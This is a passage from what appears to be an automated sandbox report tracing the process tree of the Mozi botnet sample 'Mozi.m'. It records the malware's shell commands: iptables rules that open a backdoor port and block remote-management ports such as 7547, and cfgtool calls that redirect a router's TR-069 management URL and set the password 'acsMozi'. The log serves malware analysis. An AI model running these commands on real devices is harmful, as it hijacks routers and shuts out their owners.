                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4742 Parent PID: 4739

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4742 Parent PID: 4739

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4750 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4750 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4761 Parent PID: 4750

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4761 Parent PID: 4750

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4607 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:25
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4612 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:30
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4614 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4875 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4875 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4877 Parent PID: 4875

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4877 Parent PID: 4875

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4878 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4878 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4880 Parent PID: 4878

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4880 Parent PID: 4878

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4881 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4881 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4883 Parent PID: 4881

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4883 Parent PID: 4881

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4885 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4885 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4892 Parent PID: 4885

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4892 Parent PID: 4885

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4912 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4912 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: Mozi.m PID: 4925 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4925 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: Mozi.m PID: 4940 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4940 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4950 Parent PID: 4940

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4950 Parent PID: 4940

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4975 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4975 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4985 Parent PID: 4975

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4985 Parent PID: 4975

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5005 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5005 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5011 Parent PID: 5005

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5011 Parent PID: 5005

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5012 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5012 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5014 Parent PID: 5012

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5014 Parent PID: 5012

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5015 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5015 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5019 Parent PID: 5015

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5019 Parent PID: 5015

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5035 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5035 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5044 Parent PID: 5035

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5044 Parent PID: 5035

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5069 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5069 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5079 Parent PID: 5069

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5079 Parent PID: 5069

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5097 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5097 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5105 Parent PID: 5097

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5105 Parent PID: 5097

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5112 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5112 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5121 Parent PID: 5112

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5121 Parent PID: 5112

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5139 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5139 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5144 Parent PID: 5139

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5144 Parent PID: 5139

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5146 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5146 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5152 Parent PID: 5146

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5152 Parent PID: 5146

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5169 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5169 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5183 Parent PID: 5169

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5183 Parent PID: 5169

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5199 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5199 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5201 Parent PID: 5199

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5201 Parent PID: 5199

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5202 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5202 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
